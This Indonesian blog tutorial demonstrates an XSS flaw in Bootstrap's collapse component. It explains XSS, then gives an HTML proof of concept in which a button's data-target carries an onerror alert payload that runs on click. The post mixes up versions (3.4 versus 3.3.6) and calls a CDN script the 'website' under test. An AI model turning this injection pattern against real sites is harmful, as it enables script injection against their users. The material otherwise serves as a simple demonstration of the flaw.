Sebuah kerentanan Cross Site Scripting ditemukan didalam sebuah framework yang bernama bootstrap, bootstrap merupakan framework CSS – HTML – JS yang sudah sangat terkenal dikalangan programmer Website, dan kerentanan ini terdapat pada bootstrap versi 3.4
Apa itu bootstrap ?
Bootstrap merupakan sebuah library framework CSS yang telah dibuat khusus uintuk mengembangkan front end sebuah website. Bootstrap juga dikenal sebagai salah satu framework CSS, HTML, Javascript yang begitu populer di kalangan website developer atau pengembang website
Apa kerentanannya ?
Kerentanan pada bootstrap ini adalah sebuah kerentanan yang banyak ditemui di website” umum, yaitu XSS atau Cross Site Scripting, buat kalian apa sih XSS itu ?
XSS adalah sebuah kerentanan yang sangat umum dijumpai pada aplikasi web, yang dimana kerentanan ini memungkinkan seseorang untuk memberikan / memasukkan script” tertentu di sisi klien di bagian halaman web yang dapast dilihat oleh pengguna lain. Kerentanan ini dapat digunakan penyerang untuk melewati / mem-bypass kontrol akses dari kebijakan asal
Nah, tanpa tunggu lama lagi, langsung saja kita bahas bagaimana sih cara exploit XSS di bootstrap ini ?
Exploit XSS Bootstrap
Beberapa hal yang perlu disiapkan adalah
- Website yang memiliki kerentanan tsb
- Script exploit
Oke, untuk pertam, disini saya sudah mendapatkan website untuk kita lakukan pengujian,
http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.jsKalau sudah dapat websitenya, kita langsung masukan website tersebut ke exploit kita, script exploitnya seperti dibawah ini :
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src=" target "></script>
<button data-toggle="collapse" data-target="<img src=x onerror=alert('xss')>">Test</button>Sekarang kita masukan website yang vuln ke script diatas, dan hasilnya akan seperti dibawah ini :
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
<button data-toggle="collapse" data-target="<img src=x onerror=alert('xss')>">Test</button>Nah kalau sudah, simpan script diatas dengan format ( HTML ) lalu jalankan file tersebut, setelah dijalankan kita pencet tombol test yang terdapat di script tersebut, dan hasilnya, akan keluar alert berupa tulisan ( xss ) oke, untuk hasilnya kalian bisa lihat pada gambar dibawah ini
JOSS, bisa kita lihat bahwa saat kita menekan tombol test, yang keluar adalah berupa script js alert yang bertuliskan ( xss )
Untuk kalian yang masih belum paham, bisa komen dibawah, See you
